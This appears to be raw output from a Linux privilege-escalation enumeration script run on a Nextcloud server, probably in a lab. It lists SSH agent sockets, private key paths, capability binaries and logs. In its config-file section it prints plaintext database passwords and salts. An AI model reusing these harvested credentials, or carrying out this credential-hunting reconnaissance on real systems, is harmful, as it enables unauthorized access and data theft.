/var/www/html/nextcloud/apps/nextcloud_announcements/appinfo/certificate.crt
/var/www/html/nextcloud/resources/codesigning/core.crt
/var/www/html/nextcloud/resources/codesigning/root.crt
1145PSTORAGE_CERTSBIN
══╣ Some SSH Agent files were found:
/tmp/ssh-XXXX2n9zBn/agent.1026
══╣ Writable ssh and gpg agents
/tmp/ssh-XXXX2n9zBn/agent.1026
Searching inside /etc/ssh/ssh_config for interesting info
Include /etc/ssh/ssh_config.d/*.conf
╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x. 2 root root 4096 May 16 13:12 /etc/pam.d
-rw-r--r--. 1 root root 727 May 9 13:14 /etc/pam.d/sshd auth substack password-auth auth include postlogin
account required pam_sepermit.so
account required pam_nologin.so
account include password-auth
password include password-auth
session required pam_selinux.so close
session required pam_loginuid.so
session required pam_selinux.so open env_params
session required pam_namespace.so
session optional pam_keyinit.so force revoke
session optional pam_motd.so
session include password-auth
session include postlogin
╔══════════╣ Searching kerberos conf files and tickets ╚ http://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-active-directory
ptrace protection is disabled (0), you might find tickets inside processes memory
-rw-r--r--. 1 root root 880 Apr 18 08:15 /etc/krb5.conf
# To opt out of the system crypto-policies configuration of krb5, remove the
# symlink at /etc/krb5.conf.d/crypto-policies which will not be recreated.
includedir /etc/krb5.conf.d/
Files with capabilities (limited to 50):
/usr/bin/newgidmap cap_setgid=ep
/usr/bin/newuidmap cap_setuid=ep
/usr/bin/arping cap_net_raw=p
/usr/bin/clockdiff cap_net_raw=p
/usr/sbin/suexec cap_setgid,cap_setuid=ep
╔══════════╣ Files with ACLs (limited to 50) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls files with acls in searched folders Not Found
╔══════════╣ Files (scripts) in /etc/profile.d/ ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files
╔══════════╣ Permissions in init, init.d, systemd, and rc.d ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d
╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /var/lib/dnf/history.sqlite: SQLite 3.x database, last written using SQLite version 3034001
Found /var/lib/rpm/rpmdb.sqlite: SQLite 3.x database, last written using SQLite version 3034001
-> Extracting tables from /var/lib/dnf/history.sqlite (limit 20) -> Extracting tables from /var/lib/rpm/rpmdb.sqlite (limit 20)
╔══════════╣ Web files?(output limit)
/var/www/:
total 4.0K
drwxr-xr-x. 4 root root 33 May 16 13:23 .
drwxr-xr-x. 20 root root 4.0K May 16 13:23 ..
drwxr-xr-x. 2 root root 6 May 9 03:44 cgi-bin
drwxr-xr-x. 3 root root 23 May 16 13:37 html
/var/www/cgi-bin:
total 0
drwxr-xr-x. 2 root root 6 May 9 03:44 .
╔══════════╣ Searching passwords in history files
// This file was auto-generated from sdk-root/src/data/endpoints_prefix_history.json
╔══════════╣ Searching passwords in config PHP files
password" name="password"
case DefinitionParameter::VALUE_PASSWORD: ?>
'dbpassword' => 'DhENL2JvRz5sTX',
'dbuser' => 'nextcloud',
'lost_password_link' => 'disabled',
'passwordsalt' => 'ZbwXq27T4qfGqqipdugBoXU5Dn+OjN',
'password' => 'swift',
'password' => 'Secr3tPaSSWoRdt7',
'password' => '', // Optional: if not defined, no password will be used.
* 'passwordsalt' => 'd3c944a9af095aa08f',
* to require a password. See http://redis.io/topics/security
'auth.storeCryptedPassword' => true,
'dbpassword' => '',
'dbuser' => '',
'hashing_default_password' => false,
'lost_password_link' => 'https://example.org/link/to/password/reset',
'mail_smtppassword' => '',
'passwordsalt' => '',
'proxyuserpwd' => '',
'sharing.allow_disabled_password_enforcement_groups' => false,
'sharing.enable_mail_link_password_expiration' => false,
'sharing.mail_link_password_expiration_interval' => 3600,
╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/etc/pam.d/password-auth
/etc/pki/tls/private/localhost.key
/etc/pki/tls/private/nextcloud.key
/home/echo.rivers/.gnupg/private-keys-v1.d/5DB4D1317999333A618EBC8798B2C12A1A17F101.key
/home/echo.rivers/.gnupg/private-keys-v1.d/ED1F31222B3549CF9D0A5B8224AA600251DE1E3A.key
/usr/bin/systemd-ask-password
/usr/bin/systemd-tty-ask-password-agent
/usr/include/php/ext/standard/php_password.h
/usr/lib/dracut/modules.d/01systemd-ask-password
/usr/lib/grub/i386-pc/legacy_password_test.mod
/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/systemd/system/multi-user.target.wants/systemd-ask-password-wall.path
/usr/lib/systemd/system/sysinit.target.wants/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.service
/usr/lib/systemd/system/systemd-ask-password-wall.path
/usr/lib/systemd/system/systemd-ask-password-wall.service
#)There are more creds/passwds files in the previous parent folder
/usr/lib64/mariadb/plugin/caching_sha2_password.so
/usr/lib64/mariadb/plugin/mysql_clear_password.so
/usr/lib64/mariadb/plugin/sha256_password.so
/usr/lib64/mariadb/plugin/simple_password_check.so
#)There are more creds/passwds files in the previous parent folder
/usr/sbin/grub2-setpassword
/usr/share/authselect/default/minimal/password-auth
/usr/share/authselect/default/sssd/password-auth
/usr/share/authselect/default/winbind/password-auth
/usr/share/doc/openssh/PROTOCOL.key
/usr/share/man/man1/systemd-ask-password.1.gz
/usr/share/man/man1/systemd-tty-ask-password-agent.1.gz
/usr/share/man/man3/OSSL_DECODER_CTX_set_pem_password_cb.3ossl.gz
/usr/share/man/man3/OSSL_ENCODER_CTX_set_pem_password_cb.3ossl.gz
/usr/share/man/man3/SSL_CTX_set_srp_password.3ossl.gz
/usr/share/man/man3/pem_password_cb.3ossl.gz
#)There are more creds/passwds files in the previous parent folder
/usr/share/man/man7/systemd.system-credentials.7.gz
/usr/share/man/man8/grub2-set-password.8.gz
/usr/share/man/man8/grub2-setpassword.8.gz
/usr/share/man/man8/systemd-ask-password-console.path.8.gz
/usr/share/man/man8/systemd-ask-password-console.service.8.gz
#)There are more creds/passwds files in the previous parent folder
╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs
╔══════════╣ Searching passwords inside logs (limit 70)
Jul 5 09:49:25 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 5 09:49:56 nextcloud systemd[1]: Stopped Dispatch Password Requests to Console Directory Watch.
Jul 5 09:49:56 nextcloud systemd[1]: systemd-ask-password-console.path: Deactivated successfully.
Jul 5 09:49:57 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 5 09:49:57 nextcloud systemd[1]: Started Forward Password Requests to Wall Directory Watch.
Jul 7 08:23:11 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 7 08:23:38 nextcloud systemd[1]: Stopped Dispatch Password Requests to Console Directory Watch.
Jul 7 08:23:38 nextcloud systemd[1]: systemd-ask-password-console.path: Deactivated successfully.
Jul 7 08:23:39 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 7 08:23:39 nextcloud systemd[1]: Started Forward Password Requests to Wall Directory Watch.
Jul 7 08:24:15 nextcloud sshd[926]: Accepted password for root from 172.16.20.1 port 49752 ssh2
Jul 7 14:46:29 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 7 14:46:58 nextcloud systemd[1]: Stopped Dispatch Password Requests to Console Directory Watch.
Jul 7 14:46:58 nextcloud systemd[1]: systemd-ask-password-console.path: Deactivated successfully.
Jul 7 14:46:59 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 7 14:46:59 nextcloud systemd[1]: Started Forward Password Requests to Wall Directory Watch.
Jul 7 16:07:04 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 7 16:07:31 nextcloud systemd[1]: Stopped Dispatch Password Requests to Console Directory Watch.
Jul 7 16:07:31 nextcloud systemd[1]: systemd-ask-password-console.path: Deactivated successfully.
Jul 7 16:07:32 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 7 16:07:32 nextcloud systemd[1]: Started Forward Password Requests to Wall Directory Watch.
Jul 7 18:26:29 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 7 18:26:58 nextcloud systemd[1]: Stopped Dispatch Password Requests to Console Directory Watch.
Jul 7 18:26:58 nextcloud systemd[1]: systemd-ask-password-console.path: Deactivated successfully.
Jul 7 18:26:59 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 7 18:26:59 nextcloud systemd[1]: Started Forward Password Requests to Wall Directory Watch.
Jul 10 11:32:11 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 10 11:32:37 nextcloud systemd[1]: Stopped Dispatch Password Requests to Console Directory Watch.
Jul 10 11:32:37 nextcloud systemd[1]: systemd-ask-password-console.path: Deactivated successfully.
Jul 10 11:32:38 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 10 11:32:38 nextcloud systemd[1]: Started Forward Password Requests to Wall Directory Watch.
Jul 10 11:45:29 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 10 11:46:01 nextcloud systemd[1]: Stopped Dispatch Password Requests to Console Directory Watch.
Jul 10 11:46:01 nextcloud systemd[1]: systemd-ask-password-console.path: Deactivated successfully.
Jul 10 11:46:03 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 10 11:46:03 nextcloud systemd[1]: Started Forward Password Requests to Wall Directory Watch.
Jul 14 18:59:04 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 14 19:07:46 nextcloud systemd[1]: Stopped Dispatch Password Requests to Console Directory Watch.
Jul 14 19:07:46 nextcloud systemd[1]: systemd-ask-password-console.path: Deactivated successfully.
Jul 14 19:07:48 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 14 19:07:48 nextcloud systemd[1]: Started Forward Password Requests to Wall Directory Watch.
Jul 14 19:45:34 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 14 19:46:12 nextcloud systemd[1]: Stopped Dispatch Password Requests to Console Directory Watch.
Jul 14 19:46:12 nextcloud systemd[1]: systemd-ask-password-console.path: Deactivated successfully.
Jul 14 19:46:13 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 14 19:46:13 nextcloud systemd[1]: Started Forward Password Requests to Wall Directory Watch.
Jul 14 23:02:37 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 14 23:03:07 nextcloud systemd[1]: Stopped Dispatch Password Requests to Console Directory Watch.
Jul 14 23:03:07 nextcloud systemd[1]: systemd-ask-password-console.path: Deactivated successfully.
Jul 14 23:03:08 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 14 23:03:08 nextcloud systemd[1]: Started Forward Password Requests to Wall Directory Watch.
Jul 14 23:06:20 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 14 23:06:47 nextcloud systemd[1]: Stopped Dispatch Password Requests to Console Directory Watch.
Jul 14 23:06:47 nextcloud systemd[1]: systemd-ask-password-console.path: Deactivated successfully.
Jul 14 23:06:48 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 14 23:06:48 nextcloud systemd[1]: Started Forward Password Requests to Wall Directory Watch.
Jul 15 07:05:47 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 15 07:08:30 nextcloud systemd[1]: Stopped Dispatch Password Requests to Console Directory Watch.
Jul 15 07:08:30 nextcloud systemd[1]: systemd-ask-password-console.path: Deactivated successfully.
Jul 15 07:08:35 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 15 07:08:35 nextcloud systemd[1]: Started Forward Password Requests to Wall Directory Watch.
Jul 15 07:37:07 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 15 07:39:09 nextcloud systemd[1]: Stopped Dispatch Password Requests to Console Directory Watch.
Jul 15 07:39:09 nextcloud systemd[1]: systemd-ask-password-console.path: Deactivated successfully.
Jul 15 07:39:12 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 15 07:39:12 nextcloud systemd[1]: Started Forward Password Requests to Wall Directory Watch.
Jul 15 08:19:37 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
Jul 15 08:21:30 nextcloud systemd[1]: Stopped Dispatch Password Requests to Console Directory Watch.
Jul 15 08:21:30 nextcloud systemd[1]: systemd-ask-password-console.path: Deactivated successfully.
Jul 15 08:21:37 nextcloud systemd[1]: Started Dispatch Password Requests to Console Directory Watch.
╔════════════════╗ ════════════════════════════════╣ API Keys Regex ╠════════════════════════════════ ╚════════════════╝
Regexes to search for API keys aren't activated, use param '-r'